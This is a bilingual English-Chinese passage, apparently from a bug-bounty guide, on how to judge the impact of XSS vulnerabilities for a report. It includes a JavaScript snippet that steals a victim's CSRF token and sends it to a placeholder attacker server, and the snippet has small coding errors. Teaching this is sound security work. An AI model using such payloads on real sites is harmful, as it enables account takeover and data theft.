Question

The impact of XSS varies because of several factors. For instance, the type of XSS determines the number of users who could be affected. Stored XSS on a public forum can realistically attack anyone who visits that forum page, so stored XSS is considered the most severe. On the other hand, reflected or DOM XSS can affect only users who click the malicious link, and self-XSS requires a lot of user interaction and social engineering to execute, so they are normally considered lower impact.

XSS 的影响因素很多。例如，XSS 类型决定了可能受到攻击的用户数量。在公共论坛上存储的 XSS 可以实际攻击到访问该论坛页面的任何人，因此存储的 XSS 被认为是最严重的。另一方面，反射或 DOM XSS 只能影响点击恶意链接的用户，而自我 XSS 需要大量用户交互和社交工程才能执行，因此通常被认为是较低影响力的。

The identities of the affected users matter too. Let’s say a stored XSS vulnerability is on a site’s server logs. The XSS can affect system administrators and allow attackers to take over their sessions. Since the affected users are accounts of high privilege, the XSS can compromise the integrity of the entire application. You might gain access to customer data, internal files, and API keys. You might even escalate the attack into RCE by uploading a shell or execute scripts as the admin.

受影响用户的身份也很重要。例如，一个存储型 XSS 漏洞存在于某个站点的服务器日志中。该漏洞可能会影响系统管理员，并允许攻击者接管其会话。由于受影响的用户具有高特权帐户，因此 XSS 漏洞可能会危及整个应用程序的完整性。您可能会获得客户数据、内部文件和 API 密钥的访问权限。您甚至可以通过上传 Shell 或作为管理员执行脚本来将攻击升级为 RCE。

If, instead, the affected population is the general user base, XSS allows attackers to steal private data like cookies and session tokens. This can allow attackers to hijack any user’s session and take over the associated account.

如果受影响的人群是普通用户，XSS 攻击允许攻击者窃取私人数据，例如 cookies 和会话标记。这可以让攻击者劫持任何用户的会话并接管相关账户。

Most of the time, XSS can be used to read sensitive information on the victim’s page. Since scripts executed during an XSS attack run as the target page, the script is able to access any information on that page. This means that you can use XSS to steal data and escalate your attack from there. This can be done by running a script that sends the data back to you. For example, this code snippet reads the CSRF token embedded on the victim’s page and sends it to the attacker’s server as a URL parameter named token . If you can steal a user’s CSRF tokens, you can execute actions on their behalf by using those tokens to bypass CSRF protection on the site. (See Chapter 9 for more on CSRF.)

大多数情况下，XSS 可用于读取受害者页面上的敏感信息。由于在 XSS 攻击期间执行的脚本运行为目标页面，因此该脚本能够访问该页面上的任何信息。这意味着可以使用 XSS 偷取数据并从那里升级攻击。这可以通过运行发送数据回您的脚本来完成。例如，此代码片段读取嵌入在受害者页面上的 CSRF 令牌，并将其作为名为令牌的 URL 参数发送到攻击者的服务器。如果您可以窃取用户的 CSRF 令牌，则可以使用这些令牌绕过站点上的 CSRF 保护代表他们执行操作。 （有关 CSRF 的更多信息，请参见第 9 章。）

var token = document.getElementsById('csrf-token')[0];
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://attacker_server_ip/?token="+token, true);
xhr.send(null);

XSS can also be used to dynamically alter the page the victim sees, so you can replace the page with a fake login page and trick the user into giving you their credentials (often called phishing ). XSS can also allow attackers to automatically redirect the victim to malicious pages and perform other harmful operations while posing as the legit site, such as installing malware. Before reporting the XSS you found, make sure to assess the full impact of that particular XSS to include in your vulnerability report.

XSS 也可以动态改变受害者所看到的页面，这样你就可以用一个虚假的登录页面来替换原本页面，欺骗用户输入他们的密码（通常称为网络钓鱼）。XSS 也可以让攻击者自动将受害者重定向到恶意页面并伪装成合法网站进行其他有害操作，例如安装恶意软件。在报告你发现的 XSS 之前，请确保评估该特定 XSS 的全部影响以在漏洞报告中予以考虑。